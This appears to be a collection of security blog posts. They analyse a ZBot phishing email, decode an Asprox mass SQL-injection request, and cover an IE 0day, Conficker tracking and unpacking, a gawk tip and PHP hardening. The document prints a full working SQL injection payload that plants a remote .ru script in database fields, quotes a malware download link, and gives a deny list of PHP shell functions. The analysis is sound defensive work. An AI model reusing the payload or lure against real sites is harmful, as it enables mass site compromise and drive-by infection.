Attention – Mail server upgrade

Attention!

On October 22, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.

The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.

This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That’s all.

http://updates.<some-domain>.secure.<some-evil-domain>/ssl/id=7906947-<some-address>-list@<some-domain>-patch263.exe

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

Nice trick! But no thanks! Here are some details of the downloaded binary:

File name: patch.exe

MD5 sum: 0ee4f395dd071f169e95e34454bbf446

ThreatExpert Summary: Threat characteristics of ZBot - a banking trojan that disables firewall, steals sensitive financial data (credit card numbers, online banking login details), makes screen snapshots, downloads additional components, and provides a hacker with the remote access to the compromised system.

I assumed that it was a targeted attack, and the attacker created the subdomains that look alike the real servers for each email that they send.. But I was totally wrong..

No matter what subdomain you use (or even without subdomain), and what ever file you request as long as the file extension is .EXE, the server will still going to response with HTTP/1.1 301 Moved Permanently and redirect you to the binary file.


WGET with no subdomain


WGET with random file name

More technical information on the downloaded binary:

  1. VirusTotal
  2. ThreatExpert

Mass SQL Injection And Asprox Bot

Asprox is one of the botnet that implements mass sql injection to inject malicious *.js script into MSSQL database server. Normally Asprox bot will search for any vulnerable (sql injection, of course) *.asp script to inject the malicious *.js script and iframe into database. Typical sql injection is similar to log below:

GET /page.asp?id=425;d EcLaRe @s VArcHAr(4000);sET @s=cASt(0x4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220 AS vaRcHaR(4000));eXeC (@s);--
HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
*/*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20090728 Firefox/1.5.0 Opera 9.25
Host: www.xxxx.com
Connection: Close

It’s a little bit annoying to decode all the hex chars. It’s obvious that the sql injection input is about to bypass string-based content filtering :). Out of curiosity about this sql injection, i managed to code a little ruby code to decode the sql injection (using normal trick by converting hex input via cast function). Below is the result, sample usage of the code and sample output:

shell>$ruby hex2ascii.rb '4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220'
[+] encoded string : DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor

Since in this sql injection, it used double payload of hex trick. So i need to re-execute the code again for this one:

CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E)
shell>$ ruby hex2ascii.rb 3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
[+] encoded string :

all the output need to concat again with previous string like AS vaRcHaR(4000));eXeC (@s);–. So the final sql statement will look similar to this:

d EcLaRe @s VArcHAr(4000);sET @s=DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst( As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor

From the output, we knew that attacker try to inject into the database by injecting <script src=http://www.bannert.ru/ads.js>. This script will later on will be used as iframe on the compromised database/web server to silently fetch a ads.js. Unfortunately, the ads.js is no longer available during this blog entry posted.

Below is the simple ruby code for the decoding hex values. Your need to supply input within cast functions.

#!/usr/bin/ruby
#copy this code and save as hex2ascii.rb
def usage
   puts "[+] usage: ruby hex2ascii input_string"
end
data=ARGV[0]
result=Array.new
if data==nil
   usage()
else
   data=data.delete(" ")
   data.scan(/../).each{|a|
      puts a
      result << a.hex.chr
   }
   puts "[+] encoded string : #{result.to_s}"
end

Here is how u can use the code:

shell>$ ruby hex2ascii.rb '3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E'
[+] encoded string :

* don’t forget to use quote (‘ ‘) when key in your input.

Microsoft DirectShow msvidctl.dll 0day

Another 0-day was released in-the-wild targeting Microsoft Internet Explorer. The bug is inside msvidctl.dll when working with media file (*.gif have been used in the wild exploitation). Below is the in-the-wild exploit analyzed by us (we modified the shellcode to %uxcccc).

Figure 1.0 showed the exception handler is executed and will pointing to our jump address (0c0c0c0c).

Figure 2.0 show the shellcode (xcc) been executed.

IE 0day

Figure 2.0

IE 0day 2

It’s not really a common stack overflow bug. Please read excellent vulnerability analysis done by websense here.

We released the advisory and workaround (yes, with pictures) on how to do the ‘kill-bit’ thing for this particular CLSID.

Conficker.C and DNS

We have been working to track conficker’s dns queries in order to  identify infected machines/network with conficker.c. Tracking a 50K DNS names and 500++ queries from each conficker is a bit troublesome when u have to record all the DNS queries (200M records/day) and compare it with 50K/day conficker.c domain names.:). The main idea of why we’re working on this so that the infected machine can be identify based on queries made by conficker.c to contact to the conficker.c’s c&c. Below is one of the result from our tracking on conficker.c dns query to .MY domains in the hitlist :
Conficker's DNS Queries to .MY

Another one:
Another Conficker's DNS Queries to .MY

Looking at the trends from both pictures, its coming from the same source (see over geomap). Why?..:)

The tracker is basically is a ruby code build over dnsruby’s and ruby-pcap library for collecting packets and processing the dns packets only. So far, the tracker is working fine except if it receive malformed dns traffic which normally will be discarded by the tracker

Automated Unpacking Conficker Worm Variant B

The infamous worm, Conficker, which surfaces in 21 November 2009 and is set to time-bomb on 1 April 2009, was literally over the media. Although studying its malware source code is the best way to fully understanding its features and impacts, unfortunately getting the source code to study sometimes are impossible. There is still has alternate way, which is through reverse engineering of the binary file. A lot of malware writers use packer to pack the malware either the packer is written by them or downloaded from internet. During the analysis of Conficker worm, MyCERT found that the worm has been compressed by a custom “run-time packer”. This section will focus on the techniques of automated unpacking Conficker worm variant B.

Useful tools:

  1. Ollydbg v1.10 [Download: http://www.ollydbg.de/ ]
  2. OllySript v1.67.3 [Download: http://odbgscript.sourceforge.net/]
  3. Script [Download:https://blog.honeynet.org.my/mirror/Uncompress_ConfickerB_version2.osc]

Steps:

  1. Copy the files “ODbgScript.dll” and “Uncompress_ConfickerB_version2.osc” into the folder OllyDbg.
  2. Open the OllyDbg.exe, load the binary file of Conficker variant B.
  3. Check the signature of Packer entry as below:
    1. CMP BYTE PTR SS:[ESP+8], 1
    2. JNZ conficker.xxxxxxxx
  4. Open the window of OllyScript with “Plugins” -> “ODbgScript” -> “Script Window
  5. Right click in window of OllyScript -> Select “Run Script” -> “Open Select to open the file “Uncompress_ConfickerB_version2.osc”, the script will auto run and unpack the binary of Conficker worm. Now the debugger OllyDbg landed at Original Entry Point (OEP) of binary file.

Conficker: The other not so famous Variant A

There are lot more discussions are going on for Conficker variant C (ConfickerC) due to 1st April. Why 1st april?. The 1st april is the day ConfickerC should call home for updates. The domain name generator  algorithm  used by ConfickerC is making blocking or detecting live ConfickerC update servers is becoming harder when it will search for about 50K domains name. :D. Please refer to SRI excellent  write-up for more information about ConfickerC here.  MyCERT advisory about ConfickerC is here.

I can’t say much about the current situation but based on my observation on dns traffic we have, we only observed low volume of traffics contacting ConfickerC domains name hosted in .my domain. Maybe because it wasn’t the time yet.(my timeframe of observation was on 27-29 March 09).

Compare to ConfickerA (variant A), we observed more traffics are looking for the domain name: trafficconverter.biz. Trafficconverter.biz is the server that will be contacted by ConfickerA. Take a look at ConfickerA file sample and we’ll see the domain name.It’s very disturbing to notice that variant A is still out there screaming for their C&C server while alot more discussion have been switching to ConfickerC.

....................SNIP ...............SNIP....................
....................SNIP ...............SNIP....................

Sat Mar 28 17:29:00 +0800 2009 - 202.XXX.YY.132 is looking for trafficconverter.biz.XXX.my
Sat Mar 28 16:32:07 +0800 2009 - XXX.60.YY.229 is looking for trafficconverter.biz.XXX.my
Sat Mar 28 15:29:41 +0800 2009 - 203.XXX.YY.85 is looking for trafficconverter.biz.XXX.my
Sat Mar 28 15:46:26 +0800 2009 - 202.YY.56.XXX is looking for trafficconverter.biz.XXX.my
Sat Mar 28 15:15:55 +0800 2009 - 202.XX.XX.229 is looking for trafficconverter.biz.XXX.XXX.my

....................SNIP ...............SNIP....................
....................SNIP ...............SNIP....................

During the timframe ( 27-29 March 09), it is about 1167+ queries to DNS looking for the trafficconverter.biz. it’s still considered a big infection based on DNS traffics query only. Luckily the trafficconverter.biz is no longer running. But, the infected machines is still need to be clean-up.

We already released our advisory for ConfickerA and also mentioned about tools that can be used to remove the ConfickerA. The advisory is here. If you haven’t patch your MS08-67, please do so.

Log Files: Dealing with Inconsistent Field Delimeter

Salam,

Log files are big. Processing  it  would be cumbersome especially if the field separator are not so unique.

Take a look at contain of file example.log below :

"209.34.23.99",6667,"Rembau, NSembilan,Malaysia","GET /phpmyadmin ",404
"238.34.23.99",80,"Selangor","GET /phpmyadmin/ ,200
"21.34.23.99",9090,"A. Star, Kedah, Malysia","GET /phpmyadmin/favicon.ico,404
"120.34.23.99",6667,"Malysia","GET /phpmyadmin/print.css,404
"2.34.23.99",993,"A. Star, Kedah, Malysia","GET /phpmyadmin/phpmyadmin.css.php?lang=en-utf-8,404

At first sight, anybody would agree to use ‘ as field separator. But hey, the third field contain that same character.

If we insist to choose (‘) as our separator, the field number will not be consistent through out the file.
Line 1 would have 7 field, line 2 have 5 field etc.

If the task is to print ip number and the file requested, how should we do that?

Luckily gawk have special keyword, NF, means number of field.
To print just first and second field using gawk:

gawk -F ',' '{print $1 $2 }'  example.log

# -F use to tell what the field separator character

From the example.log, the file requested is on the second last column. On line 1, its in field 6, meanwhile on second line, its on field 4.

In this case we can use NF keyword for gawk. NF would contain the number of field in each line.  To get the second last column, we can use (NF-1) as below:

gawk -F ','  '{print $1 $(NF-1) }' example.log

Hope that helps.

Securing PHP : Disabling Dangerous PHP Functions

PHP is a very popular language nowadays. But at the same time, it’s also one of the main sources for user accounts and servers getting compromised. Every PHP developer and hoster should understand the primary attack vectors being used by attackers against PHP applications. They also should be able to classify PHP functions that allowed to be used and disable cirtain functions that can be categorized as dangerous.

Based on my experience and a big help from Google, I can categorize the following functions as dangerous :-

Now you need to verify your php.ini location

And look for Configuration File (php.ini) Path

phpinfo

Now, edit the configuration file with root permission

sudo nano /etc/php5/apache2/php.ini

Look for the disable_functions = “” and modify it to

disable_functions = "shell_exec, eval, exec, system, proc_get_status, inject_code, proc_nice, proc_open, proc_terminate, apache_child_terminate, apache_setenv, fp, fput, ftp_connect, tp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, popen, escapeshellcmd, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, osix_setuid, posix_setuid, posix_uname, syslog, xmlrpc_entity_decode, proc_close, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, passthru, phpAds_xmlrpcDecode, hpAds_xmlrpcEncode, mysql_pconnect, escapeshellarg, highlight_file, define_syslog_variables, ini_restore,ini_alter, ini_get_all, openlog"

Make sure you save before exit.

Now restart Apache for the changes to take effect.

The default PHP configuration is intended for development purposes. Therefore, it is always advisable to reconfigure PHP before going into production phase. Some security settings are also recommended during the development phase to prevent programmers from producing vulnerable code, and make them stick to secure techniques.

Until next episode..

[References]